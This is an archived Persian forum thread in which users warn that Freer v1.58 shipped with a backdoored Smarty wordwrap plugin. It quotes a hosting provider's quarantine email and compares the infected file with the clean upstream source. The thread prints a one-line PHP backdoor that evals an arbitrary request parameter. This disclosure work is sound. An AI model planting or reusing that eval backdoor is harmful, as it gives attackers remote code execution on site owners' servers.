PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : باگ جدید فریر در نسخه 1.58


mehdisoheili
August 30th, 2016, 21:26
سلام
دوستان بعد از نصب فریر 1.58 به محض نصب کردن هاست من پیام زیر رو واسم ایمیل کرد:


Hello,


Our systems performed a routine malware/virus scan on your account and unfortunately located infected/malicious files. We've automatically moved the infected files(s) out of your public_html directory into a safe, quarantined directory. Below is the file our scanners were able to locate:


/home/xxxx/public_html/xxx/vf/virtual_freer_v1.58/include/libs/smarty/plugins/modifiercompiler.wordwrap.php (http://go.shopkeeper.ir/?url=http%3A%2F%2Fpkey.ir%2Fvf%2Fvirtual_freer_v1. 58%2Finclude%2Flibs%2Fsmarty%2Fplugins%2Fmodifierc ompiler.wordwrap.php)
(quarantined to /home/hawkinfected/cxsuser/ledmodul/modifiercompiler.wordwrap.php.1472574028_1) Known exploit = [Fingerprint Match] [PHP REQUEST Exploit [P0007]]


Accounts are commonly exploited through outdated software, compromised cPanel/FTP login details, or vulnerable themes/plugins in your applications. We suggest rotating your cPanel and FTP passwords immediately in the event they were compromised. Instructions on how to reset your cPanel password can be found at https://support.hawkhost.com/index.p...panel-password (http://go.shopkeeper.ir/?url=https%3A%2F%2Fsupport.hawkhost.com%2Findex.ph p%3F%2FKnowledgebase%2FArticle%2FView%2F47%2F0%2Fh ow-can-i-reset-my-cpanel-password)


If you would like more information regarding this infection, or are looking for our assistance in cleaning up your account, please contact our support team by either emailing support@hawkhost.com or submitting a ticket at https://support.hawkhost.com (http://go.shopkeeper.ir/?url=https%3A%2F%2Fsupport.hawkhost.com%2F)



چیزی که مشخصه این اکسپلویت هم توی نسخه 1.58 وجود داره دوستان دقت کنند.

یا حق
TATSERVER.NET
August 30th, 2016, 22:32
سلام
دوستان بعد از نصب فریر 1.58 به محض نصب کردن هاست من پیام زیر رو واسم ایمیل کرد:


Hello,


Our systems performed a routine malware/virus scan on your account and unfortunately located infected/malicious files. We've automatically moved the infected files(s) out of your public_html directory into a safe, quarantined directory. Below is the file our scanners were able to locate:


/home/xxxx/public_html/xxx/vf/virtual_freer_v1.58/include/libs/smarty/plugins/modifiercompiler.wordwrap.php (http://go.shopkeeper.ir/?url=http%3A%2F%2Fpkey.ir%2Fvf%2Fvirtual_freer_v1. 58%2Finclude%2Flibs%2Fsmarty%2Fplugins%2Fmodifierc ompiler.wordwrap.php)
(quarantined to /home/hawkinfected/cxsuser/ledmodul/modifiercompiler.wordwrap.php.1472574028_1) Known exploit = [Fingerprint Match] [PHP REQUEST Exploit [P0007]]


Accounts are commonly exploited through outdated software, compromised cPanel/FTP login details, or vulnerable themes/plugins in your applications. We suggest rotating your cPanel and FTP passwords immediately in the event they were compromised. Instructions on how to reset your cPanel password can be found at https://support.hawkhost.com/index.p...panel-password (http://go.shopkeeper.ir/?url=https%3A%2F%2Fsupport.hawkhost.com%2Findex.ph p%3F%2FKnowledgebase%2FArticle%2FView%2F47%2F0%2Fh ow-can-i-reset-my-cpanel-password)


If you would like more information regarding this infection, or are looking for our assistance in cleaning up your account, please contact our support team by either emailing support@hawkhost.com or submitting a ticket at https://support.hawkhost.com (http://go.shopkeeper.ir/?url=https%3A%2F%2Fsupport.hawkhost.com%2F)



چیزی که مشخصه این اکسپلویت هم توی نسخه 1.58 وجود داره دوستان دقت کنند.

یا حق


با سلام،
کد زیر رو از همون فایل حذف کنید، مربوط به یک Backdoor هست، میخوام بدونم تیم Freer چه دفاعیه ای از خودش داره...


<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>


به هر حال به زودی یک ورژن fork شده ایمن و آپدیت شده این سیستم رو در github منتشر میکنم.
mehdisoheili
August 31st, 2016, 02:30
با سلام
این سورس این فایل که درون اسکریپت فریر ورژن 1.58 جاسازی شده است مربوط به Smarty:


<?php
/**
* Smarty plugin
*
* @package Smarty
* @subpackage PluginsModifierCompiler
*/


/**
* Smarty wordwrap modifier plugin
*
* Type: modifier<br>
* Name: wordwrap<br>
* Purpose: wrap a string of text at a given length
*
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>
<?php
* @link http://smarty.php.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual)
* @author Uwe Tews
* @param array $params parameters
* @return string with compiled code
*/
function smarty_modifiercompiler_wordwrap($params, $compiler)
{
if (!isset($params[1])) {
$params[1] = 80;
}
if (!isset($params[2])) {
$params[2] = '"\n"';
}
if (!isset($params[3])) {
$params[3] = 'false';
}
return 'wordwrap(' . $params[0] . ',' . $params[1] . ',' . $params[2] . ',' . $params[3] . ')';
}


?>



و این هم کد اصلی همین فایل که از Github مربوط به فریم ورک Smarty:





<?php



/**



* Smarty plugin



*



* @package Smarty



* @subpackage PluginsModifierCompiler



*/







/**



* Smarty wordwrap modifier plugin



* Type: modifier<br>



* Name: wordwrap<br>



* Purpose: wrap a string of text at a given length



*



* @link http://smarty.php.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual)



* @author Uwe Tews



*



* @param array $params parameters



* @param $compiler



*



* @return string with compiled code



*/



function smarty_modifiercompiler_wordwrap($params, $compiler)



{



if (!isset($params[1])) {



$params[1] = 80;



}



if (!isset($params[2])) {



$params[2] = '"\n"';



}



if (!isset($params[3])) {



$params[3] = 'false';



}



$function = 'wordwrap';



if (Smarty::$_MBSTRING) {



if ($compiler->template->caching && ($compiler->tag_nocache | $compiler->nocache)) {



$compiler->template->required_plugins['nocache']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR . 'shared.mb_wordwrap.php';



$compiler->template->required_plugins['nocache']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap';



} else {



$compiler->template->required_plugins['compiled']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR . 'shared.mb_wordwrap.php';



$compiler->template->required_plugins['compiled']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap';



}



$function = 'smarty_mb_wordwrap';



}







return $function . '(' . $params[0] . ',' . $params[1] . ',' . $params[2] . ',' . $params[3] . ')';



}





بهرحال من با جایگزین کردن فایل اصلی مشکل رو حل کردم.
یکی از دلایل اصلی استفادم از سرویس دهنده خارجی همین داستان امنیت هست که هیچ تجربه خوبی از سرویس دهنده های ایرانی نداشتم...
تا حالا چند مورد پیش اومده که توی افزونه های ورد پرس هم همچین کد هایی قرار داده بودن و سرویس دهنده اتوماتیک *****شون کرد واسم...
یه سایت بنده روی یه سرور اشتراکی سرویس دهنده ایرانی که ایران سرور بود تو همین سایتم فعالیت میکنه دایما لیمیت و از دسترس خارج میشد...
که بعد ها بعد از انتقال به این سرویس دهنده متوجه شدم توی یکی از پلاگین های وردپرس کدی بود که باعث میشد منابع سیستم زیادتر از حد مجاز مصرف بشه.
کلا من تجربه خوبی در مورد سرویس دهنده های ایرانی ندارم.
تا قبل از خرید بهترین برخورد و بعد از خرید گند ترین برخورد ها رو ازشون دیده میشه نه همه ولی قشر بسیاری...
ولی خوب دیگه اطلاع رسانی بنده بود برای دوستان